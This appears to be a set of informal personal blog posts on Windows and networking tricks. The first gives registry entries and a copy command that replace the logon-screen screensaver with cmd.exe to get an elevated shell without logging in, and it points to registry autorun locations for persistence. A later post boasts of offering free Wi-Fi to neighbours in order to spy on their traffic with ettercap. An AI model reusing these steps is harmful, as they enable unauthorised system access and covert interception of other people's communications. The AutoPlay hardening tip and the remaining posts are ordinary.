a simple trick to get elevated command line from the screen saver, there are many ways to enter this data one fast trick is to use a linux reg editor its simple as making the logon script the command window. also works to do a command line of “copy cmd.exe logon.scr” this will work anywhere  but on domain controllers not booted in recovery mode. This is preventable with PGP disk encryption.

Windows Registry Editor Version 5.00

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"ScreenSaverIsSecure"="0"
"ScreenSaveTimeOut"="15"
"ScreenSaveActive"="1"
"SCRNSAVE.EXE"="cmd.exe"

OEM data you changed

Windows Registry Editor Version 5.00

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"ScreenSaverIsSecure"="0"
"ScreenSaveTimeOut"="600"
"ScreenSaveActive"="1"
"SCRNSAVE.EXE"="C:\\WINDOWS\\System32\\logon.scr"

in recent hackings I came across a few other locations that if smart you can inject autoruns

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

 

So I have never really liked wireless networks, also if I do have wireless I like to have free wireless. So today I spent 8 hours working on making a new wireless network with a captive portal. What is this you ask? You know when you use the wifi at a hotel it makes you agree to terms and conditions? and you cant browse until you accept them. thats the idea. I looked all over at like 15 solutions. Mainly the biggest being free, also that I didnt need to use services 3rd party and I didnt want it to be a windows application (dont want to use a loud computer) I happen to have a old firewall that the OS was corrupt on from work so I went to compusa and bought a CF card for 40% off. came home and installed my new os. I chose to go with http://www.pfsense.org/ its a spinoff of m0n0wall which is a very good firewall, however PFSence, has a better polish.

So after diggin out a old netgear I got it all hooked up, now I have port level fwd with packet shape and vlans, as well as a firewalled limited wifi with captive portal. way cool I now offer network service to my neighbors with the added cost of letting me spy on them. All ettercap I love you. The only interesting that I should add is im using a alpha build and its very buggy  but still works.

 

If you own a PC that the public can get to – laptop, library, corporate etc etc. Disable AutoPlay on the system via Group Policy. Do this to prevent hackers

• KB 555324
• KB 320182

 

i posted a while back about swearing at the automated caller menus, that works a lot. But if not here is a great site keep this handy when you call a major corporation - get a human caller list

when you just use your website and never look at the server that runs it. it will crash dump because its over used. and write gb's of data to your c drive to the point that windows wont run any more. then to make it more fun RDP wont have any room to cache data. so its basically a pain to get your server back on line. sorry.

I was browsing the FCC database today, the information in this database is insane. go look up a fcc ID today. Combined with the Patent Office search and you have all you need to hack things.